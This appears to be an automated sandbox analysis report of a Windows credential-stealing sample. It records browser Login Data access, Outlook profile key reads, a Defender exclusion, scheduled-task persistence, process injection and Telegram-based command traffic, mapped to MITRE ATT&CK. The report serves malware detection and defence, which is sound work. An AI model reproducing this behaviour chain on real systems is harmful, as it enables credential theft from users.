                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Users\user\Desktop\UOEAjWmusE.exe VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR

                  Source: Yara match | File source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR

                  Source: Yara match | File source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR

                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                  Source: Yara match | File source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR

                  Source: Yara match | File source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR

                  Source: Yara match | File source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR

                  MITRE ATT&CK Matrix

                  Techniques are listed per tactic in the matrix's row order. A number in square brackets is the signature-count badge the matrix shows next to that technique; where a technique carried more than one badge, extraction ran the digits together (e.g. [111]), so they are separate counts, not one number. Techniques without a badge are the matrix's standard entries with no matching signature in this analysis.

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                  Execution: Windows Management Instrumentation [1]; Native API [1]; Scheduled Task/Job [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                  Persistence: DLL Side-Loading [1]; Scheduled Task/Job [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                  Privilege Escalation: DLL Side-Loading [1]; Process Injection [111]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                  Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [31]; Process Injection [111]
                  Credential Access: OS Credential Dumping [1]; Input Capture [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                  Discovery: File and Directory Discovery [1]; System Information Discovery [13]; Security Software Discovery [111]; Process Discovery [1]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; System Network Configuration Discovery [1]; System Owner/User Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                  Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [1]; Input Capture [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                  Command and Control: Web Service [1]; Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Multiband Communication; Commonly Used Port; Application Layer Protocol
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                  Behavior Graph (ID: 1631784; sample: UOEAjWmusE.exe; start date: 07/03/2025; architecture: WINDOWS; score: 100)

                  Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures.
                  Sample-level network: reallyfreegeoip.org (signature: Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (signature: Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains.

                  Process tree (numbers in parentheses after a process name are the graph's created-file / registry-value counters):

                  UOEAjWmusE.exe (6)
                    dropped: C:\Users\user\AppData\...\gJdonuKfIrqN.exe (PE32); C:\Users\...\gJdonuKfIrqN.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpF362.tmp (XML)
                    signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                    powershell.exe (23)
                      signature: Loading BitLocker PowerShell Module
                      WmiPrvSE.exe
                      conhost.exe
                    UOEAjWmusE.exe (15, 2)
                      network: api.telegram.org 149.154.167.220 port 443 (local ports 49693, 49694), TELEGRAMRU, United Kingdom; checkip.dyndns.com 193.122.130.0 port 80 (local ports 49689, 49691), ORACLE-BMC-31898US, United States; reallyfreegeoip.org 104.21.16.1 port 443 (local ports 49690, 49692), CLOUDFLARENETUS, United States
                    schtasks.exe (1)
                      conhost.exe
                    2 other processes
                      conhost.exe
                  gJdonuKfIrqN.exe (4)
                    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
                    gJdonuKfIrqN.exe (14, 2)
